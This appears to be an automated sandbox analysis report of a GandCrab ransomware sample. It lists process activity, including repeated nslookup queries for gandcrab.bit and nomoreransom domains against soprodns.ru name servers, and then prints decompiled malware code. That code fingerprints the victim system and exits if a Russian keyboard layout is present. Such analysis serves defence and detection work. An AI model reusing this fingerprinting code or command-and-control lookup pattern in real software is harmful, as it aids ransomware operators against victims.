MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1840, Parent PID: 5896

General

Target ID:	32
Start time:	23:49:16
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 1548, Parent PID: 5900

General

Target ID:	33
Start time:	23:49:20
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1836, Parent PID: 1548

General

Target ID:	34
Start time:	23:49:20
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5864, Parent PID: 5900

General

Target ID:	36
Start time:	23:49:23
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5588, Parent PID: 5864

General

Target ID:	37
Start time:	23:49:23
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 3840, Parent PID: 5900

General

Target ID:	38
Start time:	23:49:26
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.coin dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 588, Parent PID: 3840

General

Target ID:	39
Start time:	23:49:27
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4412, Parent PID: 5900

General

Target ID:	40
Start time:	23:49:29
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 160, Parent PID: 4412

General

Target ID:	41
Start time:	23:49:30
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4928, Parent PID: 5900

General

Target ID:	42
Start time:	23:49:33
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4908, Parent PID: 4928

General

Target ID:	43
Start time:	23:49:33
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5972, Parent PID: 5900

General

Target ID:	44
Start time:	23:49:36
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.coin dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6012, Parent PID: 5972

General

Target ID:	45
Start time:	23:49:39
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5164, Parent PID: 5900

General

Target ID:	47
Start time:	23:49:42
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4824, Parent PID: 5164

General

Target ID:	48
Start time:	23:49:42
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5644, Parent PID: 5900

General

Target ID:	50
Start time:	23:49:45
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2300, Parent PID: 5644

General

Target ID:	51
Start time:	23:49:45
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5860, Parent PID: 5900

General

Target ID:	52
Start time:	23:49:48
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.coin dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5944, Parent PID: 5860

General

Target ID:	53
Start time:	23:49:48
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6052, Parent PID: 5900

General

Target ID:	54
Start time:	23:49:50
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4372, Parent PID: 6052

General

Target ID:	55
Start time:	23:49:50
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 540, Parent PID: 5900

General

Target ID:	56
Start time:	23:49:53
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2800, Parent PID: 540

General

Target ID:	57
Start time:	23:49:54
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6072, Parent PID: 5900

General

Target ID:	58
Start time:	23:50:00
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.coin dns2.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3144, Parent PID: 6072

General

Target ID:	59
Start time:	23:50:00
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4324, Parent PID: 5900

General

Target ID:	60
Start time:	23:50:02
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns2.soprodns.ru
Imagebase:	0x2f0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4824, Parent PID: 4324

General

Target ID:	61
Start time:	23:50:02
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 1252, Parent PID: 5900

General

Target ID:	62
Start time:	23:50:04
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x10000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: O8ZHhytWhn.exePID: 5900, Parent PID: 5348COMMON

Execution Graph

Execution Coverage:	26.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	41.9%
Total number of Nodes:	694
Total number of Limit Nodes:	18

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0F1D7330 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0F1D7330(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0F1D72B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0F1D72B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0F1D7A10(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0F1D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0F1D72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0F1D6E90(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xf1df348; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0F1D8950(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0F1D8950(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0F1D7A00) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0F1D79EC))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0F1D72B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

0x0f1d7330
0x0f1d7330
0x0f1d733b
0x0f1d7347
0x0f1d7357
0x0f1d7359
0x0f1d735c
0x0f1d7361
0x0f1d7368
0x0f1d7368
0x0f1d7372
0x0f1d737f
0x0f1d7386
0x0f1d7388
0x0f1d738b
0x0f1d7390
0x0f1d7390
0x0f1d73a0
0x0f1d73f6
0x0f1d73fa
0x0f1d7495
0x0f1d7499
0x0f1d7599
0x0f1d759d
0x0f1d75ad
0x0f1d75af
0x0f1d75c5
0x0f1d75c8
0x0f1d75cf
0x0f1d75d1
0x0f1d75e9
0x0f1d75f6
0x0f1d75f8
0x0f1d75f8
0x0f1d75cf
0x0f1d75ff
0x0f1d766e
0x0f1d7672
0x0f1d7677
0x0f1d7683
0x0f1d768a
0x0f1d768c
0x0f1d768c
0x0f1d768a
0x0f1d7693
0x0f1d76a7
0x0f1d76b7
0x0f1d76ba
0x0f1d76bc
0x0f1d76c4
0x0f1d76cc
0x0f1d76cc
0x0f1d76d7
0x0f1d76db
0x0f1d76e2
0x0f1d76e9
0x0f1d76f6
0x0f1d76fe
0x0f1d7704
0x0f1d770a
0x0f1d770a
0x0f1d7720
0x0f1d7727
0x0f1d7729
0x0f1d7730
0x0f1d7736
0x0f1d7736
0x0f1d773c
0x0f1d7755
0x0f1d7755
0x0f1d7768
0x0f1d7770
0x0f1d7776
0x0f1d777d
0x0f1d7790
0x0f1d7796
0x0f1d779b
0x0f1d77b9
0x0f1d779d
0x0f1d77b4
0x0f1d77b4
0x0f1d77ce
0x0f1d77d1
0x0f1d77d1
0x0f1d77e3
0x0f1d7992
0x0f1d7999
0x0f1d79e2
0x0f1d79eb
0x0f1d79eb
0x0f1d79a9
0x0f1d79af
0x0f1d79b7
0x0f1d79d6
0x0f1d79d6
0x00000000
0x0f1d79d6
0x0f1d79b9
0x0f1d79bb
0x0f1d79c2
0x00000000
0x00000000
0x0f1d79d0
0x00000000
0x0f1d77e9
0x0f1d77f7
0x0f1d77fe
0x0f1d7805
0x0f1d780c
0x0f1d7813
0x0f1d781a
0x0f1d7821
0x0f1d7828
0x0f1d782e
0x0f1d7831
0x0f1d7834
0x0f1d7840
0x0f1d7840
0x0f1d7843
0x0f1d7846
0x0f1d7847
0x0f1d784d
0x0f1d7852
0x0f1d7855
0x0f1d785a
0x0f1d785d
0x0f1d785f
0x0f1d7862
0x0f1d7867
0x0f1d786f
0x0f1d7875
0x0f1d787a
0x0f1d788b
0x0f1d7896
0x0f1d78a4
0x0f1d78a8
0x0f1d78b2
0x0f1d78c8
0x0f1d78d0
0x0f1d796b
0x00000000
0x0f1d796b
0x0f1d78f2
0x0f1d78f5
0x0f1d78f7
0x0f1d78fc
0x0f1d7908
0x0f1d790b
0x0f1d790d
0x0f1d7910
0x0f1d7919
0x0f1d792a
0x0f1d7938
0x0f1d793a
0x0f1d794c
0x0f1d7954
0x0f1d795f
0x0f1d795f
0x0f1d7976
0x0f1d7977
0x0f1d797a
0x0f1d7986
0x0f1d7988
0x0f1d798d
0x00000000
0x0f1d798d
0x0f1d7601
0x0f1d7605
0x0f1d7616
0x0f1d7618
0x0f1d761c
0x0f1d7622
0x0f1d7663
0x0f1d7663
0x0f1d7668
0x0f1d7669
0x0f1d766b
0x00000000
0x0f1d766b
0x0f1d7624
0x0f1d762b
0x00000000
0x0f1d765c
0x00000000
0x00000000
0x0f1d764e
0x00000000
0x00000000
0x0f1d7655
0x00000000
0x00000000
0x0f1d7647
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d762b
0x0f1d75ff
0x0f1d74ad
0x0f1d74b6
0x0f1d74c0
0x0f1d74c3
0x0f1d74c5
0x0f1d74c8
0x0f1d74cd
0x0f1d74d4
0x0f1d74dd
0x0f1d74df
0x0f1d74e2
0x0f1d74ec
0x0f1d74ff
0x0f1d7507
0x0f1d7564
0x0f1d7564
0x0f1d7566
0x00000000
0x0f1d7566
0x0f1d750c
0x0f1d7521
0x0f1d7529
0x0f1d7534
0x0f1d752b
0x0f1d752b
